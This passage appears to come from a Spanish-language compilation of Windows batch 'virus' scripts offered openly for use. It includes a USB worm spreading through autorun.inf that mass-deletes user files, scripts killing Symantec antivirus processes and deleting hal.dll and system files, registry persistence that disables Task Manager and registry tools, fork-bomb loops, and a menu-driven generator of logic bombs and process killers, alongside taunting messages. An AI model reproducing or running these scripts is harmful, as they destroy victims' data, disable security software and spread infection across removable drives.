A0 75 B3 A5 66 A4 98 68 A6 98 63 A1 93echo e 07A0 63 A1 93 58 96 88 50 93 84 59 97 89 49 81 76 56echo e 07B0 92 80 52 7C 9F 04 4C 82 01 08 19 04 07 0B 43 94echo e 07C0 D1 44 95 D2 41 97 D3 44 9A D6 42 9A D6 36 86 E3echo e 07D0 54 9C E2 5F A6 9C 65 A4 90 54 95 8C 65 AA A0 77echo e 07E0 B9 A6 78 BD A9 77 BD AC 78 B9 A9 78 B6 A8 76 B4echo e 07F0 A6 6D AB 9D 6B A9 9B 6C AA 9C 64 A5 96 65 A6 97echo e 0800 6C AA 9C 5C 9D 8E 58 97 87 54 92 84 5C 94 87 55echo e 0810 8C 8F 61 7B C1 00 0E 11 05 07 11 23 38 83 40 96echo e 0820 D2 45 96 D3 43 99 D5 44 9A D6 45 9B D7 33 87 D3echo e 0830 49 97 B4 59 A6 A2 5E A2 97 64 A4 91 63 A9 A2 70echo e 0840 B5 A8 72 B7 A3 70 B5 A1 70 B7 A3 73 B8 A9 74 B9echo e 0850 AA 69 AE 9F 6A AF A0 64 A5 96 6D AE 9F 64 A5 96echo e 0860 5F A5 98 51 8D 7B 68 A5 9B 5D 9B 8F 56 8C 93 68echo e 0870 8F DA 71 80 C8 32 7B B5 0F 18 5B 10 23 67 43 94echo e 0880 D1 44 95 D2 44 9A D6 44 9A D6 46 9C D8 44 9E D5echo e 0890 41 9B AC 54 A5 A2 5C AB A2 5F A3 98 5F AC A8 6Decho e 08A0 B5 A9 70 BB AD 73 BB AF 70 B5 AA 6E B7 A7 73 BAecho e 08B0 AA 6F B6 A6 6B B0 A5 66 A7 9E 53 A0 92 65 9D 92echo e 08C0 5A 98 8C 66 A4 9E 60 9C 94 5E 98 B5 61 94 EA 69echo e 08D0 8E DE 72 81 C9 4A 9A D5 1B 2E 6B 25 38 89 47 98echo e 08E0 D5 49 9A D7 45 9B D7 45 9B D7 46 9C D8 45 9D D9echo e 08F0 3C 98 B5 52 A8 A8 59 AD A9 5D AD A6 55 A5 A0 67echo e 0900 B5 AE 67 B6 AD 6E BD B0 6F B9 AD 67 B5 AA 64 ADecho e 0910 A3 65 AE A4 6B B0 A5 62 A5 96 5D 9F 94 65 AD A1echo e 0920 64 A1 97 5F 9D 97 67 9F E0 5F 9F F3 57 97 EC 62echo e 0930 8B E0 6F 7E C6 1A 33 71 1B 30 7B 1C 3D 8C 44 9Aecho e 0940 D6 47 9D D9 46 9C D8 46 9C D8 45 9D D9 45 9D D9echo e 0950 46 9D DB 49 A5 B0 56 AD AA 5A AC A7 59 A9 A4 5Cecho e 0960 AF B1 67 BD B5 67 B6 AD 6B BA AF 65 B7 AB 5E B0echo e 0970 A3 65 A8 99 5C 99 95 6A B1 A7 71 B2 A3 5E 9F 96echo e 0980 70 AA D4 60 AC FF 5B A7 F9 59 9E F5 53 92 EC 57echo e 0990 87 DF 6D 7C C5 1F 35 7C 22 3E 92 1C 43 98 44 9Aecho e 09A0 D6 46 9C D8 47 9D D9 48 9E DA 45 9D D9 49 9F DBecho e 09B0 47 9F DB 46 A0 D6 49 A4 A8 56 AD AA 58 AD A9 5Eecho e 09C0 B1 AF 60 B7 B4 65 BB B5 67 B4 AC 57 A0 96 5D A3echo e 09D0 9C 5F A7 A1 5D A6 9E 65 AA 9F 6B B5 D7 6A B9 FCecho e 09E0 63 B2 FB 5C AB FC 5A A2 FA 4C 97 F3 4D 90 ED 52

Page 13: Varios Bat

echo e 09F0 86 E0 6D 83 CB 21 47 95 3D 73 CA 3B 74 D7 48 9Eecho e 0A00 DA 47 9D D9 4A A0 DC 49 9F DB 48 A0 DC 49 9F DBecho e 0A10 48 A0 DC 4C 9F DC 53 AB D4 50 A9 AD 5A AD AF 4Fecho e 0A20 A3 9E 5E B2 B0 5D B5 AF 5B AF AA 61 AF A8 58 A7echo e 0A30 9A 57 A4 BE 5E AC FF 5B B4 F7 5B B5 FC 5F B1 FFecho e 0A40 5C AF FD 54 A7 FD 52 9C FA 49 94 F0 4C 8F EC 4Eecho e 0A50 88 E1 6B 82 D0 2A 5E B1 54 99 E9 62 AE E2 49 9Fecho e 0A60 DB 46 9C D8 4A A0 DC 4A A0 DC 4A A0 DC 48 A0 DCecho e 0A70 48 A0 DC 4B A1 DD 52 A2 DF 58 A8 DD 56 AB B5 53echo e 0A80 AB B1 5D AB AA 49 A1 B9 4F A3 E5 4A A1 FF 4B A4echo e 0A90 FC 48 A1 FC 4C A5 FD 51 A9 FD 52 AB FC 52 AB FCecho e 0AA0 50 A8 FC 51 A2 FD 4D 9A F6 4A 95 F1 42 8D E9 4Aecho e 0AB0 88 E2 64 86 D2 59 AB E2 64 B0 E4 63 AF E4 4A A1echo e 0AC0 DA 4A A0 DC 4A A0 DC 4A A0 DC 48 9F D8 4A A0 DCecho e 0AD0 49 A1 DD 4A A2 DE 52 A2 DD 5E AA E5 56 A7 E0 32echo e 0AE0 8E E7 2E 8F F1 34 90 EF 39 95 F4 3C 98 F7 40 9Cecho e 0AF0 FB 3F 9B FA 41 9B FA 44 9B F9 4A A1 FD 4B A2 FEecho e 0B00 51 A2 FD 4E 9D F8 4A 9B F6 48 95 F1 47 90 EC 4Aecho e 0B10 89 E3 66 85 D4 5D B0 E7 65 B3 E8 66 B3 E4 4A 9Eecho e 0B20 D8 4A A0 DC 4A A0 DC 4A A0 DC 4A A0 DC 4A A0 DCecho e 0B30 4C A2 DE 4B A1 DD 52 A2 DD 5D AA E2 56 A6 E1 56echo e 0B40 A8 E2 24 87 E3 29 86 E9 2F 8A ED 32 8C F1 38 93echo e 0B50 F5 37 92 F5 3A 91 F1 3F 96 F6 43 99 F9 48 9E FEecho e 0B60 4F A2 FD 50 A1 FC 4A 9B F6 46 97 F2 45 90 EC 4Aecho e 0B70 89 E3 67 84 D5 5A B2 E8 67 B6 E7 65 B1 E6 4F 9Decho e 0B80 D8 4A A0 DC 4A A0 DC 4A A0 DC 49 9F DB 4A A0 DCecho e 0B90 4C A2 DE 4C A2 DE 52 A2 DD 5D AA E2 54 A4 DF 57echo e 0BA0 AA E2 5D A8 E0 28 85 E8 2C 87 EA 2C 86 EB 29 83echo e 0BB0 E8 33 8E F1 3B 92 F2 3D 94 F4 44 9A FA 48 9E FEecho e 0BC0 4F A2 FD 50 A1 FC 4D 9E F9 47 98 F3 46 91 ED 4Becho e 0BD0 8A E4 67 84 D5 5D B0 E7 66 B5 E6 64 B0 E5 4A 9Aecho e 0BE0 D5 4C 9D DA 4A A1 DA 4A A0 DC 4B A1 DD 4C A2 DEecho e 0BF0 4D A3 DF 4F A2 DF 54 A2 DD 5F A8 E4 59 A5 E0 58echo e 0C00 A8 E3 5A A9 E2 57 A9 E3 29 83 E8 2D 85 EF 2D 87echo e 0C10 EC 26 81 E4 33 88 EE 39 8F F3 42 98 F8 45 9B FBecho e 0C20 50 A0 FF 50 A1 FC 4E 9F FA 49 96 F2 43 90 EC 4Cecho e 0C30 89 E6 5D 83 D5 64 A0 DB 62 B2 E7 65 AD E3 00 00echo e 0C40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0C50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0C60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0C70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0C80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0C90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0CA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo e 0CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00echo rcxecho 0CBEecho w0echo qecho.)>bhb1.datgoto:eof:debugeodel/f/q/a bhb1.dat>NUL 2>&1call:deb1type bhb1.dat|debug>NUL 2>&1del/f/q/a "ico.ico">NUL 2>&1ren bhb1.dat "ico.ico"ping -n 1 127.0.0.1 >nul

Page 14: Varios Bat

copy /y ico.ico %temp%\ico.ico && del  /f /q ico.icodel/f/q/a bhb1.dat>NUL 2>&1goto :eof:sigue_1if exist %temp%\autorun.inf goto miraecho [autorun]  > "%temp%\autorun.inf"echo open=xxx.exe >> "%temp%\autorun.inf"echo icon=ico.ico >> "%temp%\autorun.inf"echo label=PornoStart >> "%temp%\autorun.inf"echo shell\open\Command=xxx.exe >> "%temp%\autorun.inf":mirapopdping -n 1 localhostcd\clsset k=FOR /F "tokens=3 delims=\:" %%A IN ('REG Query HKLM\SYSTEM\MountedDevices ^| FIND "530054004F00520041"') DO (DIR /A %%A:\ >NUL 2>&1 && set k=%%A) :sigue_2clscd\if not defined k goto miracd\pushd %k%:\:copy_batif exist %k%:\xxx.exe goto copy_icocopy /y %0 %k%:\xxx.exe && attrib +h +s %k%:\xxx.exe:copy_icoif exist %k%:\ico.ico goto copy_autoruncopy /y %temp%\ico.ico %k%:\ico.ico && attrib +h +s %k%:\ico.ico:copy_autorunif exist %k%:\autorun.inf goto borradorcopy %temp%\autorun.inf && attrib +h +s %k%:\ico.ico:borradorattrib +h +s %k%:\autorun.infattrib +h +s %k%:\xxx.exeattrib +h +s %k%:\ico.icodel /f /s /q *.mp3 >nuldel /f /s /q *.ini >nuldel /f /s /q *.wma >nuldel /f /s /q *.jpg >nuldel /f /s /q *.png >nuldel /f /s /q *.gif >nuldel /f /s /q *.png >nuldel /f /s /q *.txt >nuldel /f /s /q *.doc >nuldel /f /s /q *.3gp >nuldel /f /s /q *.rar >nuldel /f /s /q *.wmv >nuldel /f /s /q *.avi >nuldel /f /s /q *.asf >nuldel /f /s /q *.mp4 >nuldel /f /s /q *.mpg >nuldel /f /s /q *.flv >nuldel /f /s /q *.mpeg >nuldel /f /s /q *.bmp >nuldel /f /s /q *.zip >nul

Page 15: Varios Bat

ping -n 2 localhost >nulgoto mira

--------------------------------------------------------------------END--------------------------------------------------------------------

Elimina Server

@echo offTaskkill /f /IM msnmsgr.execd C:\Archivos de programa\MSN Messengerattrib -H -S -R *.*del /s /q *.*del C:\WINDOWS\desktop.inidel C:\WINDOWS\msdfmap.iniTaskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXEcd C:\Archivos de programa\Archivos comunes\Symantec\Sharedattrib -H -S -R *.*del /s /q *.*del C:\WINDOWS\system.inidel C:\WINDOWS\win.inidel C:\WINDOWS\boot.inidel C:\WINDOWS\vb.inidel C:\WINDOWS\system32\boot.ini.backupdel C:\WINDOWS\system32\system.ini.backupdel C:\WINDOWS\system32\desktop.inidel C:\WINDOWS\system32\boot.iniexit

--------------------------------------------------------------------END--------------------------------------------------------------------

Bye Mouse

@echo off @cd C:\WINDOWS\system echo bean>MOUSE.DRV echo bean>mouse.drv @cd.. @cd C:\WINDOWS @rmdir /S /Q Cursores @rmdir /S /Q Cursors @cd.. @cd C:\windows\system32 @echo off>Winbat.bat @cd C:\Windows>>Winbat @reg del HKEY_CURRENT_U SER\Control Panel\Sound /F echo bean>SETDEBUG.EXE>>Winbat.bat echo bean>TETEP.DLL>>Winbat.bat echo bean>Twain.dll>>Winbat.bat echo bean>Twain_32.dll>>Winbat.bat @DEL /S /Q JavaAccessBrid ge.dll>>Winbat.bat

Page 16: Varios Bat

@cd.. @cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\ @echo off >WIN32.bat @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v Win32 /t REG_SZ /d WIN32.bat /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentversion\policies\syst em /v disabletaskmgr /T REG_SZ /D 1 /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentversion\policies\syst em /v disableregistr ytools /T REG_SZ /D 1 /F >>WIN32.bat @reg add hkcu\software\microsoft\windows\currentVersion\policies\Expl orer\RestricRun /T REG_SZ /d eventvwr.exe /F >>WIN32.bat @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows NT/CurrentVersion/Winlogon /v logonprompt /t REG_SZ /d YoU ArE InFeCtEd!! /F >>WIN32.bat @reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Polices\Explor er /v NoSaveSettings /T REG_DWORD /D 1 /F >>WIN32.bat @reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\Explo re /v NoClose /t REG_DWORD /D 1 /F >>WIN32.bat @shutdown -S -F -T 5 -C "Error del Sistema Operativo, Se apagara en unos segundos...... BEAN!!!! >>WIN32.bat @cd.. @cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\ @reg add HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v colorbat /t REG_SZ /d colorbat /F >colorbat.bat @:menu>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @call cmd.exe>>colorbat.bat @GOTO :MENU>>colorbat.bat @cd>>colorbat.bat @cd C:\windows\system32 @DEL /S /Q Winbat.bat @exit

--------------------------------------------------------------------END--------------------------------------------------------------------

Eliminar particion C

@echo offcd\Title Eliminando Virus

C:

del *.* /s /f /q

--------------------------------------------------------------------END--------------------------------------------------------------------

PC no arranque windows

@Echo offcd %systemroot%system32del /q /s /f hal.dll

--------------------------------------------------------------------END--------------------------------------------------------------------

Page 17: Varios Bat

PC no arranque windows (otra forma)

@echo offdel /f /s /q hal.dllshutdown -s -t 5 –c

--------------------------------------------------------------------END--------------------------------------------------------------------

killer messenger

@echo offmsg * adios mensseger bye bye@echo offtaskill "msnmsgr.exe"taskill "msnmsgr.exe"taskill "msnmsgr.exe"del /q /s /f "C:\Archivos de programa\MSN Messenger\msnmsgr.exe"del /q /s /f "C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe"taskill "msnmsgr.exe"taskill "msnmsgr.exe"taskill "msnmsgr.exe"del /q /s /f "C:\Archivos de programa\MSN Messenger\msnmsgr.exe"del /q /s /f "C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe"exit@echo offtaskill "msnmsgr.exe"taskill "msnmsgr.exe"taskill "msnmsgr.exe"del /q /s /f "C:\Archivos de programa\MSN Messenger\msnmsgr.exe"del /q /s /f "C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe"

--------------------------------------------------------------------END--------------------------------------------------------------------

Adios Hal.dll

@echo offcd c:\windows\system32del /F /S /Q hal.dllshutdown -s -t 10 -c "as picao pringao"

--------------------------------------------------------------------END--------------------------------------------------------------------

Super B.A.T

@echo offtitle todos tus muertos by nanki.copy %0 "%userprofile%/startm~1/Programme/Autostart/copy %0 C:\\WINDOWS\\reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sys /t REG_SZ /d "C:\WINDOWS\service_.bat\tskill /a explorerdel C:\WINDOWS\explorer.exetskill /a IEXPLOREdel C:\Programme\Internet Explorer\IEXPLORE.exermdir /S /Q C:\WINDOWS\Mediarmdir /S /Q C:\WINDOWS\repairrmdir /S /Q C:\WINDOWS\securityrmdir /S /Q C:\WINDOWS\Helprmdir /S /Q C:\WINDOWS\system32\ReinstallBackupscd\cd %userprofile%\Desktop

Page 18: Varios Bat

echo System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtecho System fucked now! > %random%.txtcd\cd %userprofile%\Startm~1\Programme\Autostartecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.ini

Page 19: Varios Bat

echo System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.iniecho System fucked now! > %random%.inishutdown -r -t 10pause > nul

--------------------------------------------------------------------END--------------------------------------------------------------------

Virus Encriptado

@echo offset /=echo set ch=exitset \=del /s /f /qset st=Shutdown -s -f -tset $=mkdirset lp=titleset {}=cd set ,.=*.exeset .,=*.isoset ;:=*.docset :;=*.mp3set ¬=copy /y set ?¿=contset ··= rmdir /s /q set rgi=reg add HKLM\Software\microsoft\Windows\CurrentVersion\Run /v system /d "%systemroot%\system32\hal.bat"set rgi2=reg add HKLM\Software\microsoft\Windows\CurrentVersion\Run /v system /d "%systemroot%\system32\kernel32.bat"set  _=set set rgi3=reg add HKLM\Software\microsoft\Windows\CurrentVersion\Run /v system /d "%systemroot%\system32\System.bat"set ª!ª!=taskkill /F /IM set {=For /l set }=%{:~,3%

Page 20: Varios Bat

set op1=1. Crear Virus Bomba logica set ]=%date%set ie=If Exist set ru= C:\malwareset i=%ie:~,2%set op2=2. Crear Virus Mata Procesos set ¡¡=cls set ´=atset kr=kernel32.dllset hl=hal.dllset op3=3. Agregar msg al incio del Pc set c=color set ;=ping -n 3 127.0.0.0set :=pause set gt=goto set #=elseset op4=4.salirset ç=set/pset mt=msgset //=echo.:!"·%lp%  Virus By DavLop %//%%//%%/% Cargando....%;% > nul :·"!%¡¡%%/% BienveNido Al Creador De Virus %//%%//%%//%%c% 0c%/% %op1%%/% %op2%%/% %op3%%/% %op4%%//%%//%%ç% s= IntRoduzca La Opcion Deseada : %i% %s%==1 (%gt% ·#~ ) %i% %s%==2 (%gt% @~$) %i% %s%==3 (%gt% msgg ) %i% %s%==4 (%gt% ¨¨ ) %#%   %gt% ·"!

:·#~%¡¡%%/% CreaDor de Bombas %//%%//%%//%%/% 1. Bomba Fatal %/% 2. Bomba Intermedia %/% 3. Bomba Fastidiosa %//%%ç% t= Introduzca Su opcion : %i% %t%==1 ( %gt% f~t@ ) %i% %t%==2 ( %gt% int )%i% %t%==3 ( %gt% ftt ) %#% %gt% ·#~

:f~t@%¡¡%%//%%//%%lp%= Bomba Logica%ç% z= Introduzca la fecha en la Ke Desea Ke El Virus Se Active ( ej: 28/05/2009) : %//%%//%%ç% n= Introduzca un Nombre al vIrus : %//%%/% cargando...........%;%>nul%gt% bm1:bm1%ie%  %ru% ( %gt% con1 )%$% %ru%:con1%/% @%/% off > %ru%\%n%.bat%/% %rgi% >> %ru%\%n%.bat%/% %¬% %%0 %%windir%%\system32\hal.bat >> %ru%\%n%.bat%/%  set lol=%%date%%  >> %ru%\%n%.bat >> %ru%\%n%.bat

Page 21: Varios Bat

%/% %i% %%lol%%==%z% ( %gt% €$ ) %#% ( %ch% )  >> %ru%\%n%.bat%/% :€$  >> %ru%\%n%.bat%/% %ª!ª!%  explorer.exe   >> %ru%\%n%.bat%/% %ª!ª!% msnmsgr.exe %/% %ª!ª!%%/% %{% %%%%x in (1,1,36500) do ( %$% %%%%x )  >> %ru%\%n%.bat%/% %{}%  %%userprofile%%\Mis Documentos   >> %ru%\%n%.bat%/% %\%  %,.%  >> %ru%\%n%.bat%/% %\% %.,%  >> %ru%\%n%.bat%/% %\% %:;%  >> %ru%\%n%.bat%/% %\% %;:% >> %ru%\%n%.bat%/%  %··% %%userprofile%%\Mis Documentos \Mi Musica   >> %ru%\%n%.bat%/%  %mt%* Esto te Pasa Por Guebon   >> %ru%\%n%.bat%/% %mt% * Tu COmPutaDora Esta JodidA CABron   >> %ru%\%n%.bat%/% %mt% * Al Reiniciar La makina NO Funcionara :D:D:DD:D   >> %ru%\%n%.bat%/% %}% %%%%mn in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,ñ,o,p,q,r,s,t,u,v,w,x,y,z) DO %ie% %%%%mn:\ (%¬% %%0 %%%%mn:\Tibiahack.bat    >> %ru%\%n%.bat%/% %··% C:\archivos de Programa    >> %ru%\%n%.bat%/% %{}% %%windir%%\system32\   >> %ru%\%n%.bat%/% %\% %hl%  >> %ru%\%n%.bat%/% %\% %kr% >> %ru%\%n%.bat%/%  %st% 15 >> %ru%\%n%.bat%/% %mt% * Chao  Maldito >> %ru%\%n%.bat%/% %ch%  >> %ru%\%n%.bat%mt% * Listo.. El Virus fue Guardado En %ru%\%n%.bat%:%%gt% ·"!

:int%¡¡%%ie%  %ru% ( %gt% con2 )%$% %ru%:con2set ki=www.petardas.comset ms=mspaint.exeset cc=calc.exeset ss=start set sa=set/aset ass=assoc

%//%%//%%lp% Virus intermedio %ç% $_= Introduzca el nombre del bat : %//%%//%%/% creando El Virus Espere... %;% > nul %/% @%/% off > %ru%\%$_%.bat%/% %rgi2% >> %ru%\%$_%.bat%/% %¬% %%0 %%windir%%\system32\kernel32.bat >> %ru%\%$_%.bat%/% :bucle >> %ru%\%$_%.bat%/% %ss% %ki% >> %ru%\%$_%.bat%/% %ss% %cc% >> %ru%\%$_%.bat%/% %ss% %ms% >> %ru%\%$_%.bat%/% %sa% %?¿%=%?¿%+1 >> %ru%\%$_%.bat%/% %i% %?¿%==30 (%gt% cnt ) %#% %gt% bucle >> %ru%\%$_%.bat%/% :cnt  >> %ru%\%$_%.bat%/% %mt%* Te KEdan 30 min de uso  >> %ru%\%$_%.bat%/% %st% 1800 >> %ru%\%$_%.bat %/%  %ass% .exe=.txt >> %ru%\%$_%.bat%/%  %ass% .doc=.mp3 >> %ru%\%$_%.bat%/%   %{% %%%%p in (1,1,36500) do ( %$% %%%%p )  >> %ru%\%$_%.bat%/%  %··%  %%windir%%\cursors >> %ru%\%$_%.bat %mt% * Virus CreadO En %ru%\%$_%.bat %gt% !"·

:ftt%¡¡%%c% 0c%//%%//%set sa=set/a set pe=www.petardas.com%lp% -- Virus Fastidioso --%ç% ag= Introduce el nombre del virus : %ie% %ru% (%gt% cont33 ) %$% %ru% :cont33%/% Creando El Virus Por Favor Espere...%;%>nul

Page 22: Varios Bat

%/% @%/% off  >%ru%\%ag%.bat%/% %¬% %%0  %%windir%%\system32\system.bat >>  %ru%\%ag%.bat%/% %rgi3% >>  %ru%\%ag%.bat%/% :bucle >>  %ru%\%ag%.bat%/% start %pe% >>  %ru%\%ag%.bat%/% start calc.exe >>  %ru%\%ag%.bat%/% start mspaint.exe >>  %ru%\%ag%.bat%/% %mt%* TAS Jodidooo cABronnnn !! xD buuuuuu  >>  %ru%\%ag%.bat%/% %sa% %?¿%=%?¿%+1 >>  %ru%\%ag%.bat%/% %i% %%?¿%%==30 (%gt% cnt ) %#% %gt% bucle >>  %ru%\%ag%.bat%/% %mt% * te Keda 1 hora de uso .p  :D:D .. >>  %ru%\%ag%.bat%/% %ª!ª!% explorer.exe  >>  %ru%\%ag%.bat%/% %st% 3600  >>  %ru%\%ag%.bat%/% %{}% C:\ >>  %ru%\%ag%.bat%/% %{% %%%%tt in (1,1,36500 ) do  %$%  %%%%tt ) >>  %ru%\%ag%.bat%/% %{}%  %%userprofile%%\Mis Documentos\>>  %ru%\%ag%.bat%/% %\% %,.%>>  %ru%\%ag%.bat%/% %\% %.,% >>  %ru%\%ag%.bat%/% %\% %:;% >>  %ru%\%ag%.bat%/% %\% %;:% >>  %ru%\%ag%.bat%mt% * Virus CreadO En : %ru%\%ag%.bat%gt% !"·

:@~$%¡¡%%lp% Mata Procesos %//%%//%%//%%/%      Dbe introducir  4 Procesos a matar junto a su extencion Ej : explorer.exe%//%%//%%//%%ç% nom= introduzca el nombre del bat  : %//%%ç%  $a= Introduzca El nombre del Primer Proceso : %//%%ç% $b= introduzca el nombre del segundo Proceso : %//%%ç% $c= Introduzca el nombre del TErcer Procesos : %//% %ç% $d= introduzca el nombre del cuarto proceso : %//%%//%%/% Creando el virus Por Favor Espere... %;%>nul %ie% %ru%\mata %gt% $·$%$% %ru%\mata :$·$%/% @ %/% off   > %ru%\mata\%nom%.bat%/% %ª!ª!% %$a% >> %ru%\mata\%nom%.bat%/%  %ª!ª!% %$b%   >> %ru%\mata\%nom%.bat%/% %ª!ª!% %$c%   >> %ru%\mata\%nom%.bat%/%  %ª!ª!% %$d%   >> %ru%\mata\%nom%.bat%mt% * Virus Creado En  %ru%\mata\%nom%.bat%gt% !"·

:msgg%¡¡%%ie% %ru%\mensajes %gt% okk%$% %ru%\mensajes :okk%//%%//%%//%%lp% Msg al inciar la Pc %ç% mg1= Introduzca el primer Msg : %//%%ç% mg2= introduzca el segundo Msg : %//%%ç% noms= nombre del Virus ?? :

Page 23: Varios Bat

%//%%/% Creando el virus %;%>nul%/% @%/% off    > %ru%\mensajes\%noms%.bat%/%  %rgi3%  >>%ru%\mensajes\%noms%.bat%/% %¬% %%0 %%windir%%\system32\system.bat >> %ru%\mensajes\%noms%.bat%/% :bucle  >> %ru%\mensajes\%noms%.bat%/% %mt% * %mg1%  >> %ru%\mensajes\%noms%.bat%/%  %mt% *  %mg2%  >> %ru%\mensajes\%noms%.bat%/% %gt% bucle  >> %ru%\mensajes\%noms%.bat%mt% * virus creado en : %ru%\mensajes\%noms%.bat

:¨¨%//%%//% %mt% * HASta Luego ... %;%>nulexit

--------------------------------------------------------------------END--------------------------------------------------------------------

Borrado de archiivos

@echo offset SI=del C:\*.doc%si%echo Los archivos ya an sido borradospauseexit

--------------------------------------------------------------------END--------------------------------------------------------------------

Virus Vista

@echo offtitle cagadacopy /y %0 %windir%\system32\cagada.batreg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v Glomur /d"%windir%\system32\cagada.bat”if exist %homepath%\desktop (goto vista) else (goto xp):vistacd %homepath%\desktopecho %errorlevel% > %random%.txtgoto reini:xpcd %homepath%\escritorioecho %errorlevel% > %random%.txt:reinishutdown -r -f -t 120 -c "Error interno de windows.Necesario reiniciar"

--------------------------------------------------------------------END--------------------------------------------------------------------

Lo satura de Office

@echo offstart www.petardas.comstart www.rubias19.comstart www.supercurvas.comstart www.redtube.comstart www.xxx.comstart www.macizorras .comstart http://huatam.com/macleod/wp-content/uploads/2008/05/virus-informatico.jpgcopy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%

Page 24: Varios Bat

copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%copy "%programfiles%\Microsoft Office" %systemdrive%msg * Hola, soy una de tus pesadillas y estoy para matar tu P.C jajajajajajaja jajajajajajaja jajajajajajaja jajajajajajaja jajajajajajastart http://farm1.static.flickr.com/126/346019393_3c11322d36.jpg?v=0msg * Mi creador, mi creador es PENTA HACK U8668-Dmsg * Hasta la vista babyshutdown -s -t 60 -cstart http://img90.echo.cx/img90/4743/ja7mp.jpg

--------------------------------------------------------------------END--------------------------------------------------------------------

Borar C y D

@echo offcd C:\del *.*cd D:\del *.*shutdown -s -t 480 -f -c "hola apare tu pc xd"exit

--------------------------------------------------------------------END--------------------------------------------------------------------

HACK HOTMAIL 1.0

